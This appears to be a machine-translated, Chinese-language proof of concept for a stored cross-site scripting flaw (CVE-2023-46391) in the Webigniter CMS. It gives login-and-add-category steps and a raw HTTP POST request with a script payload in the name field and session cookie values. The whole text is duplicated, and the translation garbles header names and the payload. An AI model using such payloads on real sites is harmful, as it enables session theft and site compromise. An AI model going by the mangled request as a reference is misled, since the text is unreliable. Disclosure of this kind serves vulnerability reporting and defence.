#利用标题: Webigniter V28.7.23存储的跨站点脚本(XSS)
#利用作者: Sagar Banwa
#日期: 19/10/2023
#vendor: https://webigniter.net/
#Software: https://webigniter.net/demo
#参考: https://portswigger.net/web-security/cross-site-scripting
#在: Windows 10/Kali Linux上测试
#CVE : CVE-2023-46391
存储的跨站点脚本(XSS):
存储的XSS,也称为持续的XSS,是两者中更具破坏性的。当将恶意脚本直接注入脆弱的Web应用程序中时,就会发生。反射的XSS涉及将恶意脚本从Web应用程序中反射到用户的浏览器中。
步骤至复发:
1。登录到帐户
2。转到类别。
3。现在添加类似名称部分使用有效载荷:'scriptalert(1)/脚本,然后选择layoutfile作为cat.php
要求
POST/CMS/类别/添加HTTP/2
host: demo.webigniter.net
cookie: ci_session=IQ8K2MJLP2DG4PQA42M3V3DN2D4LMTJB;哈希=6ROMVKMOHKVIB4ZYPWJXMJIV6VHTQLFW6BDHLRJX
用户- 代理: Mozilla/5.0(Windows NT 10.0; Win64; X64; rv:109.0)Gecko/20100101 Firefox/115.0
ACCEPT:文本/HTML,Application/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,/; q=0.8
Accept-Language: en-us,en; q=0.5
Accept-incoding: Gzip,Deflate,br
content-type:应用程序/x-www-form-urlenceded
内容长度: 94
Origin: https://demo.webigniter.net
Referer: https://demo.webigniter.net/cms/categories/add
升级- 不肯定- requests: 1
sec-fetch-Dest:文档
sec-fetch mode:导航
sec-fetch-site:相同原产
sec-fetch-user:1
TE:拖车
名称=%22%3E%3CScript%3EALERT%281%29%3C%2FScript%3Slug=Scriptalert1ScriptLayout_file=Cat.php
#利用作者: Sagar Banwa
#日期: 19/10/2023
#vendor: https://webigniter.net/
#Software: https://webigniter.net/demo
#参考: https://portswigger.net/web-security/cross-site-scripting
#在: Windows 10/Kali Linux上测试
#CVE : CVE-2023-46391
存储的跨站点脚本(XSS):
存储的XSS,也称为持续的XSS,是两者中更具破坏性的。当将恶意脚本直接注入脆弱的Web应用程序中时,就会发生。反射的XSS涉及将恶意脚本从Web应用程序中反射到用户的浏览器中。
步骤至复发:
1。登录到帐户
2。转到类别。
3。现在添加类似名称部分使用有效载荷:'scriptalert(1)/脚本,然后选择layoutfile作为cat.php
要求
POST/CMS/类别/添加HTTP/2
host: demo.webigniter.net
cookie: ci_session=IQ8K2MJLP2DG4PQA42M3V3DN2D4LMTJB;哈希=6ROMVKMOHKVIB4ZYPWJXMJIV6VHTQLFW6BDHLRJX
用户- 代理: Mozilla/5.0(Windows NT 10.0; Win64; X64; rv:109.0)Gecko/20100101 Firefox/115.0
ACCEPT:文本/HTML,Application/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,/; q=0.8
Accept-Language: en-us,en; q=0.5
Accept-incoding: Gzip,Deflate,br
content-type:应用程序/x-www-form-urlenceded
内容长度: 94
Origin: https://demo.webigniter.net
Referer: https://demo.webigniter.net/cms/categories/add
升级- 不肯定- requests: 1
sec-fetch-Dest:文档
sec-fetch mode:导航
sec-fetch-site:相同原产
sec-fetch-user:1
TE:拖车
名称=%22%3E%3CScript%3EALERT%281%29%3C%2FScript%3Slug=Scriptalert1ScriptLayout_file=Cat.php